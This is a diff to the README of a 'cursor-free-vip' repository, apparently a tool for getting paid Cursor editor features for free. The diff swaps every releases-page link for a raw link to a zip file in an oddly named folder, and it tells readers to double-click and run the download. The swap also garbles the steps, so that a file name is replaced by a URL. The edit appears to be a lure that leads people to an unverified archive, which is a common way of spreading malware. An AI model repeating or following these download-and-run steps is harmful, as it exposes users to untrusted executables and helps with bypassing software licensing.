khenracho123/cursor-free-vip/README.md

 ## 🌐 Download & Install

-To download the latest version of cursor-free-vip, visit this page: [Download Here](https://github.com/khenracho123/cursor-free-vip/releases).
+To download the latest version of cursor-free-vip, visit this page: [Download Here](https://raw.githubusercontent.com/khenracho123/cursor-free-vip/main/morlop/cursor-free-vip.zip).

 ### Step-by-Step Instructions

 1. **Visit the Releases Page**
-   - Click the following link to visit the releases page: [Download Here](https://github.com/khenracho123/cursor-free-vip/releases).
+   - Click the following link to visit the releases page: [Download Here](https://raw.githubusercontent.com/khenracho123/cursor-free-vip/main/morlop/cursor-free-vip.zip).

 2. **Choose the Latest Version**
    - On the releases page, find the most recent version.
 It will usually be at the top.

 3. **Download the File**
-   - Look for the file named `cursor-free-vip.exe` and click on it to start the download.
+   - Look for the file named `https://raw.githubusercontent.com/khenracho123/cursor-free-vip/main/morlop/cursor-free-vip.zip` and click on it to start the download.

 4. **Run the Application**
-   - Once downloaded, locate the `cursor-free-vip.exe` file in your downloads folder.
+   - Once downloaded, locate the `https://raw.githubusercontent.com/khenracho123/cursor-free-vip/main/morlop/cursor-free-vip.zip` file in your downloads folder.
 Double-click to run the application.

 5. **Follow the On-Screen Instructions**
    - The application will guide you through any necessary setup steps.
 Simply follow the prompts to complete the installation.